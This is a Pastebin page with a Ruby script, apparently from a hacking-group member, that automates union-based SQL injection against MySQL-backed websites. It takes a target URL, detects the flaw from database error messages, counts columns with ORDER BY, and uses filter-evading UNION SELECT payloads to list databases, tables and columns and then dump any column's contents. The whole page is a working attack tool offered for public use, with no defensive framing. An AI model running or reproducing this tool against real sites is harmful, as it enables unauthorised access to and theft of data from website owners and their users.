Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/user/bin/ruby
- require'open-uri'
- =begin
- Auto Sql Injection Exploiter
- By Hamza Killer xD :D
- To Sec4ever && s3ck.net
- TO : Uzun-Dz , R0x , Black-id xD
- This tools is public_version inject union based (intiger and string)
- the priv8 tools inject blind sql && union based && error based
- xD soon it will be public xD
- my eng khkhkhk
- =end
- ### Homee Functiop
- class String
- def red; "\033[31m#{self}\033[0m" end
- def green; "\033[32m#{self}\033[0m" end
- def brown; "\033[33m#{self}\033[0m" end
- def gray; "\033[37m#{self}\033[0m" end
- def bg_black; "\033[40m#{self}\0330m" end
- def bg_red; "\033[41m#{self}\033[0m" end
- def bg_green; "\033[42m#{self}\033[0m" end
- def bg_brown; "\033[43m#{self}\033[0m" end
- def bg_blue; "\033[44m#{self}\033[0m" end
- def bg_magenta; "\033[45m#{self}\033[0m" end
- def bg_cyan; "\033[46m#{self}\033[0m" end
- def bg_gray; "\033[47m#{self}\033[0m" end
- end
- def home()
- text=[
- "[*]=========================================[*]",
- "[*] Auto Sql Injection Exploit V 1.0[*]",
- "[*] H A M Z A K I L L E R[*]",
- "[*] Hlyzidi[at]gmail[dot]com[*]",
- "[*]=========================================[*]"
- ]
- for oo in text
- puts oo.red
- sleep(0.1)
- end
- end
- ## function 0
- def get_con(url)
- f = open(url)
- x=f.readlines.join
- return x
- end
- ## Function 1
- def url_x(url)
- if(url =~ /http:\/\//)
- url=URI(url)
- elsif (url =~ /https:\/\//)
- puts "Tool NOt work with ssl sorry "
- exit
- else
- url=URI("http://#{url}")
- end
- end
- ## function 2
- def infected_1(url)
- x=get_con(url)
- if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i)
- return true
- end
- end
- ## Function 3
- def get_all_data(url,clm,pay)
- xssp="#{url}#{pay}"
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,SchEmA_NamE,0x68616d7a6178647a)*/"
- begin
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}+FroM+iNForMaTion_SchEmA.SchEmAta--+-")
- rescue
- print "some thing Wrong"
- end
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- for dat in data.uniq
- puts "|| [+] #{dat[0]}"
- end
- end
- ## function 4
- def url_pasq(ur,col)
- p=ur.sub("=","=-");
- po="+/*!12345UNION*/+/*!12345SELECT*/+1";
- while (i=2 < col)
- i=2+1
- pppp="#{p}#{po}+,#{i}--+-"
- return pppp
- end
- end
- ###
- def get_data(url,clm,pay)
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,database(),0x2f3a3a2f,version(),0x2f3a3a2f,user(),0x68616d7a6178647a)*/"
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}")
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- begin
- for dat in data[0]
- xd=dat.split("/::/")
- database=xd[0]
- version=xd[1]
- user=xd[2]
- puts "[+] Db server user :#{user} ".green
- puts "[+] Database version : #{version} ".green
- puts "[+] current Database : #{database}".green
- end
- end
- rescue
- puts "Error !!!!!"
- end
- ### Function for Hex Encoding
- def hex_string(url,clm,pay,xstring)
- xssp="#{url}#{pay}"
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,%270x%27,HEX(%27#{xstring}%27),0x68616d7a6178647a)*/"
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}+--")
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- for dat in data.uniq
- return dat[0]
- end
- end
- ##### Function For Get All tables
- def get_all_tables(url,clm,pay,db)
- xssp="#{url}#{pay}"
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,table_name,0x68616d7a6178647a)*/"
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}+from+information_schema.tables+where+table_schema=#{db}--+-")
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- for dats in data.uniq
- for dat in dats
- puts "|| [+] #{dat}".brown
- end
- end
- end
- ####### Function For Get All colum
- def get_all_clum(url,clm,pay,db,table)
- xssp="#{url}#{pay}"
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,column_name,0x68616d7a6178647a)*/"
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}+FROM+INFORMATION_ScheMa./*!columNs*/+WhErE+tablE_scheMa=#{db}+and+table_name=#{table}--+-")
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- for dat in data.uniq
- puts "[+] #{dat[0]}".green
- end
- end
- ######## Finily GEt All Data
- def get_all_data_bitch(url,clm,pay,db,table,colm)
- xssp="#{url}#{pay}"
- payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,#{colm},0x68616d7a6178647a)*/"
- xuxrl=pay.sub("#{clm}","#{payload}")
- xurl=URI("#{url}#{xuxrl}+FroM+#{db}.#{table}--+-")
- xd=get_con(xurl)
- data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
- for dat in data.uniq
- puts "[+] #{dat[0]}"
- end
- end
- #####
- ##########Chek if vul ############
- home()
- print("# Eenter Url ->")
- begin
- urld=gets.chomp
- if !(urld)
- print "# Error !!!!!!!!!"
- exit
- end
- url=url_x(urld)
- x=infected_1("#{url}'")
- rescue
- print "# Error !!!!!!!!!\n"
- exit
- end
- if(x)
- print"[+] #{url} => SQl Injection Found\n".bg_blue
- print"[+] injection type is Integer\n".bg_blue
- else
- puts"[-] Not Vul ".bg_cyan
- puts"[*] Or injection type is string".bg_cyan
- end
- #########################################
- #### Get column Infected
- for i in 1..50
- urls=URI("#{url}+Order+by+#{i}--+-")
- x=get_con(urls)
- if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i|| x=~/in 'order clause'/i)
- clnb=i-1;
- break
- sleep(0.2)
- end
- end
- ####
- ####
- print"[+] columns number : #{clnb}\n".bg_blue
- #### NOw GEt Infected columns
- print"[+] Searching for infected columns ...........\n".bg_red
- p=urld.sub("=","=-");
- po="+/*!12345UNION*/+/*!12345SELECT*/+";
- all_url="#{p}#{po}"
- dz=[]
- begin
- for i in (2..clnb).to_a
- dz.push(i)
- sleep(0.00003)
- end
- rescue
- print "Error xD :D !!!!!".bg_red
- exit
- end
- clm_num=dz.join(",")
- clm_num="1,#{clm_num}"
- x_clminf="#{all_url}#{clm_num}--"
- for ix in (1..clnb)
- xpx=clm_num.sub("#{ix}",'0x68616d7a6178647a');
- ppps=URI("#{all_url}#{xpx}--")
- x_url=get_con(ppps)
- if(x_url =~ /hamzaxdz/i)
- p_ss=ix
- break
- end
- sleep(0.00003)
- end
- puts "[+] Found infected columns is : #{p_ss}".bg_brown
- # print All information
- get_data(all_url,p_ss,clm_num)
- # GET All Database
- into=["||==================================================||",
- "||=========== databases ===========||",
- "||==================================================||"]
- xbar=["||==================================================||"]
- for ine in into
- puts ine
- sleep(0.2)
- end
- get_all_data(all_url,p_ss,clm_num)
- for ine in xbar
- puts ine
- sleep(1)
- end
- print('# PLZ chois Database :')
- data_user=gets.chomp
- ## Now Select Database And Fuck It
- database_hex=hex_string(all_url,p_ss,clm_num,data_user) ## Database Hex_encode
- ## Now Extreact Tables
- into=["||==================================================||",
- "||=========== Tables ===========||",
- "||==================================================||"]
- for ine in into
- puts ine
- sleep(0.2)
- end
- get_all_tables(all_url,p_ss,clm_num,database_hex)
- for ine in xbar
- puts ine
- sleep(1)
- end
- print('# PLZ Enter Table :')
- tab_user=gets.chomp
- table_hex=hex_string(all_url,p_ss,clm_num,tab_user)### Hexing This Fuck xD
- into=["||==================================================||",
- "||=========== columns ===========||",
- "||==================================================||"]
- for ine in into
- puts ine
- sleep(0.2)
- end
- get_all_clum(all_url,p_ss,clm_num,database_hex,table_hex)
- for ine in xbar
- puts ine
- sleep(1)
- end
- ### Now Bitch Start Work And Get All Data Fuck Fuck Zhhhhh:D
- a=true
- while a
- print "# Enter columns ->"
- clm=gets.chomp
- begin
- get_all_data_bitch(all_url,p_ss,clm_num,data_user,tab_user,clm)
- rescue
- print "Error !!!!!!\n"
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement